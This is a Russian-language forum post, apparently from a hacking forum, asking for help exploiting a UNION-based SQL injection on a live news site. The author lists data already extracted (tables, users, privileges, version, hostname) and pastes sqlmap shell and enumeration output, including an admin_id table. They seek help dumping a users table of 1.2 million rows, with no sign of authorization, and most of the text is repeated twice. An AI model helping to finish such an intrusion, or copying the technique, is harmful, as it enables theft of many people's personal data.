Всем добрый день, подскажите, имеется SQLi в передаваемом артикуле новости. Кратко:
Какие данные я могу получить:
- таблицы
- имена БД
- пользователи
- привилегии
- кол-во строк в таблицах
- первую колонку таблицы
- хостнейм
- версия
Данные которые я не могу получить:
- колонки таблиц ( за исключением первой по порядку), даже при указании явного наименования, запрос не возвращается.
- текущую БД
- не могу сделать дамп.
Метод "UNION query". Если в GET параметре сформировать 2 запроса к БД, ресурс вернёт привычную для него Error, что артикул не найден в БД. --no-cast | --hex и прочее пробовал через sqlmap. WAF отсутствует, вывод результатов запросов не фильтруется. Вручную пробовал, при запросе database() ломается отображения нумерации, то есть из 11 колонок, выводится 7, при запросе version(),hostname() и прочего, всё выводится корректно.
Как выводится текущая БД sqlmap:
При попытке выполнить команду sql-query, sqlmap захлебывается на определении текущей БД для выполнения запроса.
Кол-во колонок sqlmap определяет корректно, но на этом вывод заканчивается.
Справка:
Траффик ресурса - 2м.
БД users - 1.2м строк.
Буду благодарен за любую помощь по решению проблемы.
Какие данные я могу получить:
- таблицы
- имена БД
- пользователи
- привилегии
- кол-во строк в таблицах
- первую колонку таблицы
- хостнейм
- версия
Данные которые я не могу получить:
- колонки таблиц ( за исключением первой по порядку), даже при указании явного наименования, запрос не возвращается.
- текущую БД
- не могу сделать дамп.
Метод "UNION query". Если в GET параметре сформировать 2 запроса к БД, ресурс вернёт привычную для него Error, что артикул не найден в БД. --no-cast | --hex и прочее пробовал через sqlmap. WAF отсутствует, вывод результатов запросов не фильтруется. Вручную пробовал, при запросе database() ломается отображения нумерации, то есть из 11 колонок, выводится 7, при запросе version(),hostname() и прочего, всё выводится корректно.
Как выводится текущая БД sqlmap:
sql-shell> database()
[15:53:49] [INFO] fetching SQL query output: 'database()'
database(): ' '
[15:53:49] [INFO] fetching SQL query output: 'database()'
database(): ' '
sql-shell> SELECT @@datadir
[15:55:38] [INFO] fetching SQL SELECT statement query output: 'SELECT @@datadir'
SELECT @@datadir: '/rdsdbdata/db/'
[15:55:38] [INFO] fetching SQL SELECT statement query output: 'SELECT @@datadir'
SELECT @@datadir: '/rdsdbdata/db/'
sql-shell> version()
[15:53:53] [INFO] fetching SQL query output: 'version()'
version(): '5.7.12'
[15:53:53] [INFO] fetching SQL query output: 'version()'
version(): '5.7.12'
При попытке выполнить команду sql-query, sqlmap захлебывается на определении текущей БД для выполнения запроса.
Кол-во колонок sqlmap определяет корректно, но на этом вывод заканчивается.
[16:17:12] [INFO] fetching columns for table 'tables' in database 'DB'
[16:17:12] [INFO] starting 15 threads
[16:17:12] [INFO] starting 15 threads
[16:17:14] [INFO] fetching entries for table 'tables' in database 'DB'
[16:17:14] [INFO] starting 6 threads
[16:17:14] [INFO] resumed: '1'
[16:17:14] [INFO] resumed: '3'
[16:17:14] [INFO] resumed: '4'
[16:17:14] [INFO] resumed: '5'
[16:17:14] [INFO] resumed: '6'
[16:17:14] [INFO] resumed: '2'
[16:17:14] [INFO] starting 6 threads
[16:17:14] [INFO] resumed: '1'
[16:17:14] [INFO] resumed: '3'
[16:17:14] [INFO] resumed: '4'
[16:17:14] [INFO] resumed: '5'
[16:17:14] [INFO] resumed: '6'
[16:17:14] [INFO] resumed: '2'
Database: DB
Table: tables
[6 entries]
+----------+
| admin_id |
+----------+
| 1 |
| 2 |
| 3 |
| 4 |
| 5 |
| 6 |
+----------+
Table: tables
[6 entries]
+----------+
| admin_id |
+----------+
| 1 |
| 2 |
| 3 |
| 4 |
| 5 |
| 6 |
+----------+
Справка:
Траффик ресурса - 2м.
БД users - 1.2м строк.
Буду благодарен за любую помощь по решению проблемы.
Последнее редактирование: